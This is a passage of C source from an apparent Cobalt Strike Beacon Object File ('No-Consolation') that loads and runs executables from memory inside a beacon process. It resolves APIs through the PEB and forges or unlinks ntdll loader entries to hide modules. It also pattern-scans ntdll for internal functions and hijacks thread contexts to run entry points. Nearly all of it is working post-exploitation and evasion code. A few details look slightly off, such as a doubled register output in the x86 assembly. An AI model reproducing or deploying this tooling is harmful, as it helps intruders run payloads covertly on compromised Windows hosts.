             * lets just iterate over all loaded modules and
             * find a module with the export we are looking for
             */

            addr = find_reference(base, dll_name, new_api);
        }
        else
        {
            /*
             * we got a different DLL, call xGetProcAddress recursively
             */

            addr = xGetProcAddress(newbase, new_api, 0);
        }
    }

    return addr;
}

// find a DLL by name, load it if not found
LPVOID xGetLibAddress(
    IN PCHAR search,
    IN BOOL load,
    OUT PBOOL loaded)
{
    PPEB2                   peb          = NULL;
    PPEB_LDR_DATA2          ldr          = NULL;
    PIMAGE_DOS_HEADER       dos          = NULL;
    PIMAGE_NT_HEADERS       nt           = NULL;
    PLDR_DATA_TABLE_ENTRY2  dte          = NULL;
    PIMAGE_EXPORT_DIRECTORY exp          = NULL;
    LPVOID                  addr         = NULL;
    LPVOID                  base         = NULL;
    DWORD                   rva          = 0;
    PCHAR                   name         = NULL;
    CHAR                    dll_name[64] = { 0 };
    DWORD                   i            = 0;
    int                     correct      = -1;

    if (loaded)
        *loaded = FALSE;

    for(i = 0; search[i] != 0 && i < 64; i++)
    {
        dll_name[i] = search[i];
    }
    dll_name[i] = 0;
    // make sure the name ends with '.dll'
    if (dll_name[i-4] != '.')
    {
        dll_name[i++] = '.';
        dll_name[i++] = 'd';
        dll_name[i++] = 'l';
        dll_name[i++] = 'l';
        dll_name[i++] = 0;
    }

    peb = (PPEB2)READ_MEMLOC(PEB_OFFSET);
    ldr = (PPEB_LDR_DATA2)peb->Ldr;

    // for each DLL loaded
    for (dte=(PLDR_DATA_TABLE_ENTRY2)ldr->InLoadOrderModuleList.Flink;
         correct != 0 && dte->DllBase != NULL && addr == NULL;
         dte=(PLDR_DATA_TABLE_ENTRY2)dte->InLoadOrderLinks.Flink)
    {
        base = dte->DllBase;
        dos  = (PIMAGE_DOS_HEADER)base;
        nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
        rva  = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (rva == 0) continue;

        exp  = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
        name = RVA2VA(PCHAR, base, exp->Name);

        correct = _stricmp(dll_name, name);

        if (correct == 0) {
            addr = base;
        }
    }

    //DPRINT("Address of %s: %p", dll_name, addr);

    // if the DLL was not found, load it
    if (!addr && load)
    {
        addr = LoadLibraryA(dll_name);
        DPRINT("Dll not found. Loaded %s via LoadLibrary at 0x%p", dll_name, addr);
        if (addr && loaded)
            *loaded = TRUE;
    }

    return addr;
}

ULONG ldr_hash_entry(
    IN UNICODE_STRING UniName,
    IN BOOL XorHash)
{
    ULONG ulRes = 0;

    NTSTATUS ( WINAPI *RtlHashUnicodeString ) ( PCUNICODE_STRING, BOOLEAN, ULONG, PULONG ) = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL), "RtlHashUnicodeString", 0);
    if (!RtlHashUnicodeString)
    {
        api_not_found("RtlHashUnicodeString");
        return 0;
    }

    RtlHashUnicodeString(&UniName, TRUE, 0, &ulRes);

    if (XorHash)
    {
        ulRes &= (LDR_HASH_TABLE_ENTRIES - 1);
    }

    return ulRes;
}

#ifdef _WIN64

PLDR_DATA_TABLE_ENTRY2 find_ldr_table_entry(
    IN PCWSTR BaseName)
{
    PPEB2                  peb        = NULL;
    PLDR_DATA_TABLE_ENTRY2 pCurEntry  = NULL;
    PLIST_ENTRY            pListHead  = NULL;
    PLIST_ENTRY            pListEntry = NULL;

    peb = (PPEB2)READ_MEMLOC(PEB_OFFSET);

    pListHead  = &peb->Ldr->InLoadOrderModuleList;
    pListEntry = pListHead->Flink;

    do
    {
        pCurEntry  = CONTAINING_RECORD(pListEntry, LDR_DATA_TABLE_ENTRY2, InLoadOrderLinks);
        pListEntry = pListEntry->Flink;

        if (wcscmp(BaseName, pCurEntry->BaseDllName.Buffer) == 0)
            return pCurEntry;
    } while (pListEntry != pListHead);

    DPRINT_ERR("Failed to find FindLdr table entry for %ls", BaseName);

    return NULL;
}

/*
 * Try to find the address of ntdll!LdrpModuleBaseAddressIndex
 */
PRTL_RB_TREE find_module_base_address_index(VOID)
{
    SIZE_T                 stEnd             = 0;
    PRTL_BALANCED_NODE     pNode             = NULL;
    PRTL_RB_TREE           pModBaseAddrIndex = NULL;
    PLDR_DATA_TABLE_ENTRY2 ldr_entry         = NULL;
    PIMAGE_NT_HEADERS      nt                = NULL;
    PIMAGE_SECTION_HEADER  sh                = NULL;
    SIZE_T                 stRet             = 0;
    DWORD                  dwLen             = 0;
    SIZE_T                 stBegin           = 0;
    PMEMORY_STRUCTS        mem_structs       = NULL;

    // check if we have saved the address of the module_base_address_index
    mem_structs = BeaconGetValue(NC_MEM_STRUCTS_KEY);
    if (mem_structs && mem_structs->module_base_address_index)
        return mem_structs->module_base_address_index;

    ldr_entry = find_ldr_table_entry(L"ntdll.dll");
    if (!ldr_entry)
        return NULL;

    pNode = &ldr_entry->BaseAddressIndexNode;

    do
    {
        pNode = (PRTL_BALANCED_NODE)(pNode->ParentValue & (~7));
    } while (pNode->ParentValue & (~7));

    if (!pNode->Red)
    {
        dwLen   = 0;
        stBegin = 0;

        nt = RVA2VA(
            PIMAGE_NT_HEADERS,
            ldr_entry->DllBase,
            ((PIMAGE_DOS_HEADER)ldr_entry->DllBase)->e_lfanew);

        sh = IMAGE_FIRST_SECTION(nt);

        for (INT i = 0; i < nt->FileHeader.NumberOfSections; i++)
        {
            if (!strncmp(".data", (LPCSTR)sh->Name, 6))
            {
                stBegin = RVA2VA(SIZE_T, ldr_entry->DllBase, sh->VirtualAddress);
                dwLen   = sh->Misc.VirtualSize;
                break;
            }

            ++sh;
        }

        if (!stBegin || !dwLen)
        {
            DPRINT("Failed to find section");
            return NULL;
        }

        for (DWORD i = 0; i < dwLen - sizeof(SIZE_T); ++stBegin, ++i)
        {
            stRet = RtlCompareMemory((PVOID)stBegin, &pNode, sizeof(SIZE_T));

            if (stRet == sizeof(SIZE_T))
            {
                stEnd = stBegin;
                break;
            }
        }

        if (stEnd)
        {
            PRTL_RB_TREE pTree = (PRTL_RB_TREE)stEnd;

            if (pTree && pTree->Root && pTree->Min)
                pModBaseAddrIndex = pTree;
        }
    }

    if (!pModBaseAddrIndex)
    {
        DPRINT_ERR("Failed to find module base address index");
    }
    else
    {
        // save the address of the module_base_address_index;
        if (mem_structs)
            mem_structs->module_base_address_index = pModBaseAddrIndex;
    }

    return pModBaseAddrIndex;
}

/*
 * This function is equivalent to ntdll!LdrpInsertModuleToIndexLockHeld
 */
BOOL update_base_address_entry(
    IN PLDR_DATA_TABLE_ENTRY2 ldr_entry,
    IN BOOL add_entry)
{
    PRTL_RB_TREE           pModBaseAddrIndex = NULL;
    PLDR_DATA_TABLE_ENTRY2 pNodeLdrEntry     = NULL;
    PRTL_BALANCED_NODE     pLdrNode          = NULL;
    PRTL_BALANCED_NODE     CurrNode          = NULL;
    BOOL                   bRight            = FALSE;
    PVOID                  lpBaseAddr        = ldr_entry->DllBase;

    pModBaseAddrIndex = find_module_base_address_index();
    if (!pModBaseAddrIndex)
        return FALSE;

    if (!add_entry)
    {
        VOID ( WINAPI *RtlRbRemoveNode ) ( PRTL_RB_TREE, PRTL_BALANCED_NODE ) = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL), "RtlRbRemoveNode", 0);
        if (!RtlRbRemoveNode)
        {
            api_not_found("RtlRbRemoveNode");
            return FALSE;
        }

        RtlRbRemoveNode(pModBaseAddrIndex, &ldr_entry->BaseAddressIndexNode);
        return TRUE;
    }

    pLdrNode = pModBaseAddrIndex->Root;
    CurrNode = pLdrNode;

    while (pLdrNode != NULL)
    {
        CurrNode = pLdrNode;

        pNodeLdrEntry = CONTAINING_RECORD(pLdrNode, LDR_DATA_TABLE_ENTRY2, BaseAddressIndexNode);

        if (pNodeLdrEntry->DllBase <= lpBaseAddr)
        {
            pLdrNode = CurrNode->Right;

            if (!pLdrNode)
            {
                bRight = TRUE;
                break;
            }
        }
        else
        {
            pLdrNode = CurrNode->Left;
        }
    }

    VOID ( WINAPI *RtlRbInsertNodeEx ) ( PRTL_RB_TREE, PRTL_BALANCED_NODE, BOOLEAN, PRTL_BALANCED_NODE ) = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL), "RtlRbInsertNodeEx", 0);
    if (!RtlRbInsertNodeEx)
    {
        api_not_found("RtlRbInsertNodeEx");
        return FALSE;
    }

    RtlRbInsertNodeEx(pModBaseAddrIndex, CurrNode, bRight, &ldr_entry->BaseAddressIndexNode);
    ldr_entry->Flags |= 0x80;

    return TRUE;
}

/*
 * Find the address of ntdll!LdrpHashTable in memory
 */
PLIST_ENTRY find_hash_table(VOID)
{
    PPEB2                  peb           = NULL;
    PLIST_ENTRY            pList         = NULL;
    PLIST_ENTRY            pHead         = NULL;
    PLIST_ENTRY            pEntry        = NULL;
    PLDR_DATA_TABLE_ENTRY2 pCurrentEntry = NULL;
    ULONG                  ulHash        = 0;
    PMEMORY_STRUCTS        mem_structs   = NULL;

    // check if we have saved the address of the hash_table
    mem_structs = BeaconGetValue(NC_MEM_STRUCTS_KEY);
    if (mem_structs && mem_structs->hash_table)
        return mem_structs->hash_table;

    peb = (PPEB2)READ_MEMLOC(PEB_OFFSET);

    pHead  = &peb->Ldr->InInitializationOrderModuleList;
    pEntry = pHead->Flink;

    do
    {
        pCurrentEntry = CONTAINING_RECORD(
            pEntry,
            LDR_DATA_TABLE_ENTRY2,
            InInitializationOrderLinks);

        pEntry = pEntry->Flink;

        if (pCurrentEntry->HashLinks.Flink == &pCurrentEntry->HashLinks)
            continue;

        pList = pCurrentEntry->HashLinks.Flink;

        if (pList->Flink == &pCurrentEntry->HashLinks)
        {
            ulHash = ldr_hash_entry(pCurrentEntry->BaseDllName, TRUE);

            pList = (PLIST_ENTRY)(
                (size_t)pCurrentEntry->HashLinks.Flink -
                ulHash * sizeof(LIST_ENTRY));

            break;
        }

        pList = NULL;
    } while (pHead != pEntry);

    if (!pList)
    {
        DPRINT_ERR("Failed to find hash table");
    }
    else
    {
        // save the address of the hash_table
        if (mem_structs)
            mem_structs->hash_table = pList;
    }

    return pList;
}

#endif

BOOL unlink_module(
    IN PLDR_DATA_TABLE_ENTRY2 ldr_entry)
{
#ifdef _WIN64
    // remove from the base address entry
    if (!update_base_address_entry(ldr_entry, FALSE))
        return FALSE;

    // remove from the ldr hash table
    unlink_from_list(&ldr_entry->HashLinks);
#endif

    // remove from standard lists
    unlink_from_list(&ldr_entry->InLoadOrderLinks);
    unlink_from_list(&ldr_entry->InMemoryOrderLinks);
    unlink_from_list(&ldr_entry->InInitializationOrderLinks);

    return TRUE;
}

/*
 * Link the Ldr entry into all the PEB lists
 */
BOOL link_ldr_entry(
    IN PLDR_DATA_TABLE_ENTRY2 ldr_entry)
{
    PPEB2          peb           = NULL;
    PPEB_LDR_DATA2 ldr           = NULL;
#ifdef _WIN64
    PLIST_ENTRY    LdrpHashTable = NULL;
    ULONG          ulHash        = 0;

    LdrpHashTable = find_hash_table();
    if (!LdrpHashTable)
        return FALSE;

    // add to the ldr hash table
    if (!update_base_address_entry(ldr_entry, TRUE))
        return FALSE;

    // insert into the ldr hash table
    ulHash = ldr_hash_entry(ldr_entry->BaseDllName, TRUE);
    insert_tail_list(&LdrpHashTable[ulHash], &ldr_entry->HashLinks);
#endif

    peb = (PPEB2)READ_MEMLOC(PEB_OFFSET);
    ldr = (PPEB_LDR_DATA2)peb->Ldr;

    // insert into standard lists
    insert_tail_list(&ldr->InLoadOrderModuleList, &ldr_entry->InLoadOrderLinks);
    insert_tail_list(&ldr->InMemoryOrderModuleList, &ldr_entry->InMemoryOrderLinks);
    insert_tail_list(&ldr->InInitializationOrderModuleList, &ldr_entry->InInitializationOrderLinks);

    return TRUE;
}

PLDR_DATA_TABLE_ENTRY2 create_ldr_entry(
    IN PLOADED_PE_INFO peinfo,
    IN PVOID base_address)
{
    PIMAGE_NT_HEADERS      nt        = NULL;
    PLDR_DATA_TABLE_ENTRY2 ldr_entry = NULL;
    LPWSTR                 pe_wname  = NULL;
    LPWSTR                 pe_wpath  = NULL;

    nt = RVA2VA(PIMAGE_NT_HEADERS, base_address, ((PIMAGE_DOS_HEADER)base_address)->e_lfanew);

    NTSTATUS ( WINAPI *NtQuerySystemTime ) ( PLARGE_INTEGER ) = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL), "NtQuerySystemTime", 0);
    if (!NtQuerySystemTime)
    {
        api_not_found("NtQuerySystemTime");
        return NULL;
    }

    ldr_entry = intAlloc(sizeof(LDR_DATA_TABLE_ENTRY2));
    if (!ldr_entry)
    {
        malloc_failed();
        return NULL;
    }

    pe_wname = intAlloc(sizeof(WCHAR) * MAX_PATH);
    wcscpy(pe_wname, peinfo->pe_wname);
    pe_wpath = intAlloc(sizeof(WCHAR) * MAX_PATH);
    wcscpy(pe_wpath, peinfo->pe_wpath);

    // start setting the values in the entry
    NtQuerySystemTime(&ldr_entry->LoadTime);

    ldr_entry->ReferenceCount        = 1;
    ldr_entry->LoadReason            = LoadReasonDynamicLoad;
    ldr_entry->OriginalBase          = nt->OptionalHeader.ImageBase;
    ldr_entry->ImageDll              = TRUE;
    ldr_entry->LoadNotificationsSent = TRUE;
    ldr_entry->EntryProcessed        = TRUE;
    ldr_entry->InLegacyLists         = TRUE;
    ldr_entry->InIndexes             = TRUE;
    ldr_entry->ProcessAttachCalled   = TRUE;
    ldr_entry->InExceptionTable      = FALSE;
    ldr_entry->DllBase               = base_address;
    ldr_entry->SizeOfImage           = nt->OptionalHeader.SizeOfImage;
    ldr_entry->TimeDateStamp         = nt->FileHeader.TimeDateStamp;
    myRtlInitUnicodeString(&ldr_entry->BaseDllName, pe_wname);
    myRtlInitUnicodeString(&ldr_entry->FullDllName, pe_wpath);
    ldr_entry->ObsoleteLoadCount     = 1;
    ldr_entry->Flags                 = LDRP_IMAGE_DLL | LDRP_ENTRY_INSERTED | LDRP_ENTRY_PROCESSED | LDRP_PROCESS_ATTACH_CALLED | LDRP_DONT_CALL_FOR_THREADS;
    ldr_entry->BaseNameHashValue     = ldr_hash_entry(ldr_entry->BaseDllName, FALSE);
    ldr_entry->EntryPoint            = RVA2VA(PVOID, base_address, nt->OptionalHeader.AddressOfEntryPoint);

    // set the correct values in the Ddag node struct
    ldr_entry->DdagNode = intAlloc(sizeof(LDR_DDAG_NODE));
    if (!ldr_entry->DdagNode)
    {
        malloc_failed();
        intFree(ldr_entry);
        return NULL;
    }

    ldr_entry->NodeModuleLink.Flink    = &ldr_entry->DdagNode->Modules;
    ldr_entry->NodeModuleLink.Blink    = &ldr_entry->DdagNode->Modules;
    ldr_entry->DdagNode->Modules.Flink = &ldr_entry->NodeModuleLink;
    ldr_entry->DdagNode->Modules.Blink = &ldr_entry->NodeModuleLink;
    ldr_entry->DdagNode->State         = LdrModulesReadyToRun;
    ldr_entry->DdagNode->LoadCount     = 1;

    return ldr_entry;
}

BOOL link_module(
    IN PLOADED_PE_INFO peinfo,
    IN PVOID base_address)
{
    PLDR_DATA_TABLE_ENTRY2 ldr_entry = NULL;
    BOOL                   Success   = FALSE;

    ldr_entry = create_ldr_entry(peinfo, base_address);
    if (!ldr_entry)
        goto Cleanup;

    if (!link_ldr_entry(ldr_entry))
        goto Cleanup;

    Success = TRUE;

Cleanup:
    if (!Success && ldr_entry)
        intFree(ldr_entry);

    if (Success)
        peinfo->ldr_entry = ldr_entry;

    return Success;
}


================================================
FILE: Execution-BOF/No-Consolation/source/runner.c
================================================

#include "runner.h"

BOOL exec_entrypoint_inthread(
    IN PVOID EntryPoint,
    IN PVOID Param1,
    IN PVOID Param2,
    IN PVOID Param3)
{
    Entry_t   Entry    = EntryPoint;
    PVOID     Rsp      = NULL;
    PVOID     Rbp      = NULL;
    PEXEC_CTX exec_ctx = NULL;

    // get RSP and RBP
#ifdef _WIN64
    __asm__(
        "mov rax, rsp \n"
        "mov rdx, rbp \n"
        : "=r" (Rbp), // RDX OUT
          "=r" (Rsp)  // RAX OUT
        :
    );
#else
    __asm__(
        "mov eax, esp \n"
        "mov edx, ebp \n"
        : "=r" (Rbp), // EDX OUT
          "=r" (Rbp)  // EAX OUT
        :
    );
#endif

    // save the execution context in the Key/Value store
    exec_ctx = intAlloc(sizeof(EXEC_CTX));
    exec_ctx->Rsp = Rsp;
    exec_ctx->Rbp = Rbp;
    exec_ctx->Rip = &&return_addr;
    exec_ctx->Tid = get_tid();
    BeaconAddValue(NC_EXEC_CTX, exec_ctx);

    // jumping to the entry point... wish me luck!
    Entry(Param1, Param2, Param3);

return_addr:
    DPRINT("Execution context restored"); // :^)

    memset(exec_ctx, 0, sizeof(EXEC_CTX));
    intFree(exec_ctx);
    BeaconRemoveValue(NC_EXEC_CTX);

    return TRUE;
}

BOOL run_pe_inthread(
    IN PLOADED_PE_INFO peinfo)
{
    if (peinfo->is_dll)
    {
        if (peinfo->method)
        {
            DPRINT("Executing %ls!%s", peinfo->pe_wname, peinfo->method);

            if (peinfo->cmdwline || peinfo->cmdline)
            {
                if (peinfo->use_unicode)
                {
                    if (!exec_entrypoint_inthread(peinfo->DllParam, (PVOID)peinfo->cmdwline, NULL, NULL))
                    {
                        return FALSE;
                    }
                }
                else
                {
                    if (!exec_entrypoint_inthread(peinfo->DllParam, (PVOID)peinfo->cmdline, NULL, NULL))
                    {
                        return FALSE;
                    }
                }
            }
            else
            {
                if (!exec_entrypoint_inthread(peinfo->DllParam, NULL, NULL, NULL))
                {
                    return FALSE;
                }
            }
        }
        else
        {
            if (peinfo->DllMain)
            {
                DPRINT("Executing DllMain(hinstDLL, DLL_PROCESS_ATTACH, NULL)");

                if (!exec_entrypoint_inthread(peinfo->DllMain, peinfo->pe_base, (PVOID)DLL_PROCESS_ATTACH, NULL))
                {
                    return FALSE;
                }
            }
        }
    }
    else
    {
        DPRINT("Executing %ls", peinfo->pe_wname);

        if (!exec_entrypoint_inthread(peinfo->EntryPoint, NULL, NULL, NULL))
        {
            return FALSE;
        }
    }

    return TRUE;
}

BOOL set_thread_context(
    IN HANDLE hThread,
    IN PVOID Rip,
    IN PVOID Param1,
    IN PVOID Param2,
    IN PVOID Param3)
{
    CONTEXT  threadCtx = { 0 };
    NTSTATUS status    = STATUS_UNSUCCESSFUL;
    PVOID    Ret       = NULL;

    memset(&threadCtx, 0, sizeof(threadCtx));
    threadCtx.ContextFlags = CONTEXT_ALL;

    NTSTATUS (NTAPI* NtGetContextThread)(HANDLE, PCONTEXT) = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL), "NtGetContextThread", 0);
    NTSTATUS (NTAPI* NtSetContextThread)(HANDLE, PCONTEXT) = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL), "NtSetContextThread", 0);

    if (!NtGetContextThread)
    {
        api_not_found("NtGetContextThread");
        return FALSE;
    }

    if (!NtSetContextThread)
    {
        api_not_found("NtSetContextThread");
        return FALSE;
    }

    status = NtGetContextThread(hThread, &threadCtx);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtGetContextThread", status);
        return FALSE;
    }

    CONTEXT_SET_IP( threadCtx, Rip );
    CONTEXT_SET_ARG1( threadCtx, Param1 );
    CONTEXT_SET_ARG2( threadCtx, Param2 );
    CONTEXT_SET_ARG3( threadCtx, Param3 );

#ifdef _M_IX86
    // on x86, some DLLs crash at RtlExitUserThread if we don't add some extra space
    CONTEXT_ADD_STACK_SPACE( threadCtx, sizeof(PVOID) * 5 );
#endif

    /*
     * for DLLs, the return address is usually NULL
     * when this is the case, we simply set it to RtlExitUserThread
     */
    if (CONTEXT_GET_RET( threadCtx ) == NULL)
    {
        Ret = xGetProcAddress(xGetLibAddress("ntdll", TRUE, NULL), "RtlExitUserThread", 0);
        CONTEXT_SET_RET( threadCtx, Ret);
    }

    status = NtSetContextThread(hThread, &threadCtx);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetContextThread", status);
        return FALSE;
    }

    return TRUE;
}

BOOL prepare_thread(
    IN PLOADED_PE_INFO peinfo)
{
    if (peinfo->is_dll)
    {
        if (peinfo->method)
        {
            DPRINT("Executing %ls!%s", peinfo->pe_wname, peinfo->method);

            if (peinfo->cmdwline || peinfo->cmdline)
            {
                if (peinfo->use_unicode)
                {
                    if (!set_thread_context(peinfo->hThread, peinfo->DllParam, (PVOID)peinfo->cmdwline, NULL, NULL))
                    {
                        return FALSE;
                    }
                }
                else
                {
                    if (!set_thread_context(peinfo->hThread, peinfo->DllParam, (PVOID)peinfo->cmdline, NULL, NULL))
                    {
                        return FALSE;
                    }
                }
            }
            else
            {
                if (!set_thread_context(peinfo->hThread, peinfo->DllParam, NULL, NULL, NULL))
                {
                    return FALSE;
                }
            }
        }
        else
        {
            if (peinfo->DllMain)
            {
                DPRINT("Executing DllMain(hinstDLL, DLL_PROCESS_ATTACH, NULL)");

                if (!set_thread_context(peinfo->hThread, peinfo->DllMain, peinfo->pe_base, (PVOID)DLL_PROCESS_ATTACH, NULL))
                {
                    return FALSE;
                }
            }
        }
    }
    else
    {
        DPRINT("Executing %ls", peinfo->pe_wname);

        if (!set_thread_context(peinfo->hThread, peinfo->EntryPoint, NULL, NULL, NULL))
        {
            return FALSE;
        }
    }

    return TRUE;
}

BOOL resume_thread(
    IN PLOADED_PE_INFO peinfo)
{
    DWORD (WINAPI* ResumeThread) (HANDLE) = xGetProcAddress(xGetLibAddress("kernel32", TRUE, NULL), "ResumeThread", 0);
    if (!ResumeThread)
    {
        api_not_found("ResumeThread");
        return FALSE;
    }

    if (ResumeThread(peinfo->hThread) == -1)
    {
        function_failed("ResumeThread");
        return FALSE;
    }

    return TRUE;
}

BOOL read_output_from_thread(
    IN PLOADED_PE_INFO peinfo,
    OUT PBOOL aborted)
{
    DWORD         output_length   = 0;
    DWORD         event_type      = -1;
    BOOL          thread_finished = FALSE;
    PCHAR         recv_buffer     = NULL;
    BOOL          check_timeout   = peinfo->timeout != 0;
    LARGE_INTEGER frequency       = { 0 };
    LARGE_INTEGER before          = { 0 };
    LARGE_INTEGER after           = { 0 };

    // Get timestamp immediately before running PE for comparison later
    if (check_timeout && !QueryPerformanceFrequency(&frequency))
    {
        function_failed("QueryPerformanceFrequency");
        check_timeout = FALSE;
    }

    if (check_timeout && !QueryPerformanceCounter(&before))
    {
        function_failed("QueryPerformanceCounter");
        check_timeout = FALSE;
    }

    // Allocate buffer to hold output from PE
    if (!peinfo->nooutput)
    {
        recv_buffer = intAlloc(BUFFER_SIZE);
        if (!recv_buffer)
        {
            malloc_failed();
            return FALSE;
        }
    }

    do {
        // Get current time
        if (check_timeout && !QueryPerformanceCounter(&after))
        {
            function_failed("QueryPerformanceCounter");
            check_timeout = FALSE;
        }

        // Check if the timeout was reached
        if (check_timeout && (after.QuadPart - before.QuadPart) > (peinfo->timeout * frequency.QuadPart))
        {
            // Kill thread
            if (peinfo->hThread && !TerminateThread(peinfo->hThread, 0))
            {
                function_failed("TerminateThread");
            }

            if (peinfo->hThread)
                NtClose(peinfo->hThread);
            peinfo->hThread = NULL;

            check_timeout   = FALSE;
            thread_finished = TRUE;

            if (aborted)
                *aborted = TRUE;
        }

        if (!thread_finished && peinfo->hThread)
        {
            // Wait for the thread to terminate
            event_type = WaitForSingleObject(peinfo->hThread, _WAIT_TIMEOUT);

            switch (event_type) {
            case WAIT_ABANDONED:
                break;
            case WAIT_TIMEOUT:
                break;
            case WAIT_FAILED:
                function_failed("WaitForSingleObject");
                break;
            case WAIT_OBJECT_0:
                DPRINT("The thread has finished");
                NtClose(peinfo->hThread);
                peinfo->hThread = NULL;
                check_timeout   = FALSE;
                thread_finished = TRUE;
                break;
            default:
                DPRINT("Unknown event type: %d", event_type);
            }
        }

        if (!peinfo->nooutput)
        {
            // See if/how much data is available to be read from pipe
            if (!PeekNamedPipe(peinfo->Handles->hRead, NULL, 0, NULL, &output_length, NULL))
            {
                function_failed("PeekNamedPipe");
            }

            // If there is data to be read, zero out buffer, read data, and send back to CS
            if (output_length)
            {
                memset(recv_buffer, 0, BUFFER_SIZE);

                if (ReadFile((PVOID)peinfo->Handles->hRead, recv_buffer, BUFFER_SIZE - 1, NULL, NULL))
                {
                    // Send output back
                    PRINT("%s", recv_buffer);
                }
                else
                {
                    function_failed("ReadFile");
                }
            }
        }
    } while (!thread_finished || output_length);

    // Free results buffer
    if (recv_buffer)
    {
        memset(recv_buffer, 0, BUFFER_SIZE);
        intFree(recv_buffer);
    }

    return TRUE;
}

BOOL read_output_inthread(
    IN PLOADED_PE_INFO peinfo)
{
    DWORD output_length = 0;
    PCHAR recv_buffer   = NULL;

    if (peinfo->nooutput)
        return TRUE;

    recv_buffer = intAlloc(BUFFER_SIZE);
    if (!recv_buffer)
    {
        malloc_failed();
        return FALSE;
    }

    do {
        // See if/how much data is available to be read from pipe
        if (!PeekNamedPipe(peinfo->Handles->hRead, NULL, 0, NULL, &output_length, NULL))
        {
            function_failed("PeekNamedPipe");
        }

        // If there is data to be read, zero out buffer, read data, and send back to CS
        if (output_length)
        {
            memset(recv_buffer, 0, BUFFER_SIZE);

            if (ReadFile((PVOID)peinfo->Handles->hRead, recv_buffer, BUFFER_SIZE - 1, NULL, NULL))
            {
                // Send output back
                PRINT("%s", recv_buffer);
            }
            else
            {
                function_failed("ReadFile");
            }
        }
    } while (output_length);

    // Free results buffer
    memset(recv_buffer, 0, BUFFER_SIZE);
    intFree(recv_buffer);

    return TRUE;
}

BOOL run_pe(
    IN PLOADED_PE_INFO peinfo)
{
    BOOL      aborted = FALSE;
    DllMain_t DllMain = NULL;

    /*
     * If we are supposed to run DllMain,
     * make sure the DLL has an entrypoint
     */
    if (peinfo->is_dll && !peinfo->method && !peinfo->DllMain)
    {
        PRINT("The DLL %ls does not have an entrypoint", peinfo->pe_wname);
        return TRUE;
    }

    if (peinfo->inthread)
    {
        if (!run_pe_inthread(peinfo))
        {
            return FALSE;
        }

        if (!read_output_inthread(peinfo))
        {
            return FALSE;
        }
    }
    else
    {
        if (!prepare_thread(peinfo))
        {
            return FALSE;
        }

        if (!resume_thread(peinfo))
        {
            return FALSE;
        }

        if (!read_output_from_thread(peinfo, &aborted))
        {
            return FALSE;
        }
    }

    if (peinfo->is_dll && peinfo->DllMain && !aborted && !peinfo->dont_unload)
    {
        /*
         * The DLL's thread has exited,
         * now we call DllMain with DLL_PROCESS_DETACH.
         * We only do this when the PE exits gracefully
         */

        DPRINT("Executing DllMain(hinstDLL, DLL_PROCESS_DETACH, NULL)");

        DllMain = peinfo->DllMain;
        DllMain(peinfo->pe_base, DLL_PROCESS_DETACH, NULL);
    }

    if (aborted)
    {
        PRINT_ERR("timeout reached");
    }
    else
    {
        PRINT("done");
    }

    return TRUE;
}


================================================
FILE: Execution-BOF/No-Consolation/source/utils.c
================================================
#include "utils.h"

#ifdef _WIN64

// TODO: implement ntdll!LdrpHandleTlsData
PVOID find_ldrp_handle_tls_data(VOID)
{
    PIMAGE_NT_HEADERS      nt             = NULL;
    PIMAGE_DOS_HEADER      dos            = NULL;
    DWORD                  rva            = 0;
    DWORD                  size           = 0;
    PRUNTIME_FUNCTION      func_table     = NULL;
    PRUNTIME_FUNCTION      func_entry     = NULL;
    PVOID                  func_addr      = NULL;
    DWORD                  func_size      = 0;
    PBYTE                  bytes_to_match = (PBYTE)"\xba\x23\x00\x00\x00\x48\x83\xc9\xff\xe8";
    PVOID                  address        = NULL;
    PVOID                  rip            = NULL;
    PVOID                  nt_set         = NULL;
    DWORD                  offset         = 0;
    PMEMORY_STRUCTS        mem_structs    = NULL;

    /*
     * We parse the export directory to get a reference to all non-leaf functions in ntdll.
     * For each one, we check if we find a call to NtSetInformationProcess with
     * PROCESS_INFORMATION_CLASS set to ProcessTlsInformation (0x23)
     */

    mem_structs = BeaconGetValue(NC_MEM_STRUCTS_KEY);
    if (mem_structs && mem_structs->ldrp_handle_tls_data)
        return mem_structs->ldrp_handle_tls_data;

    dos    = xGetLibAddress("ntdll", TRUE, NULL);
    nt     = RVA2VA(PIMAGE_NT_HEADERS, dos, dos->e_lfanew);
    nt_set = xGetProcAddress(dos, "NtSetInformationProcess", 0);
    if (!nt_set)
    {
        api_not_found("NtSetInformationProcess");
        return NULL;
    }

    rva  = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
    size = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].Size / sizeof(RUNTIME_FUNCTION);
    func_table = RVA2VA(PRUNTIME_FUNCTION, dos, rva);
    // iterate over each non-leaf functions in ntdll
    for (DWORD i = 0; i < size; ++i)
    {
        func_entry = RVA2VA(PRUNTIME_FUNCTION, func_table, (sizeof(RUNTIME_FUNCTION) * i));
        func_addr  = RVA2VA(PVOID, dos, func_entry->BeginAddress);
        func_size  = func_entry->EndAddress - func_entry->BeginAddress;
        // search for the byte pattern on this function
        if (find_pattern(func_addr, func_size, bytes_to_match, "xxxxxxxxxx", &address))
        {
            /*
             * We found a function call with the parameters -1 and 0x28, lets confirm
             * the function being called is indeed NtSetInformationProcess
             */

            rip     = RVA2VA(PVOID, address, 10 + sizeof(DWORD));
            offset  = (ULONG_PTR)nt_set - (ULONG_PTR)rip;
            address = RVA2VA(PVOID, address, 10);
            if (*(PDWORD)address == offset)
            {
                // if the offset matches, then the function being call is NtSetInformationProcess

                // save the address of the ldrp_handle_tls_data;
                if (mem_structs)
                    mem_structs->ldrp_handle_tls_data = func_addr;

                return func_addr;
            }
        }
    }

    api_not_found("LdrpHandleTlsData");

    return NULL;
}

// TODO: implement ntdll!LdrpReleaseTlsEntry
PVOID find_ldrp_release_tls_entry(VOID)
{
    PIMAGE_NT_HEADERS      nt             = NULL;
    PIMAGE_DOS_HEADER      dos            = NULL;
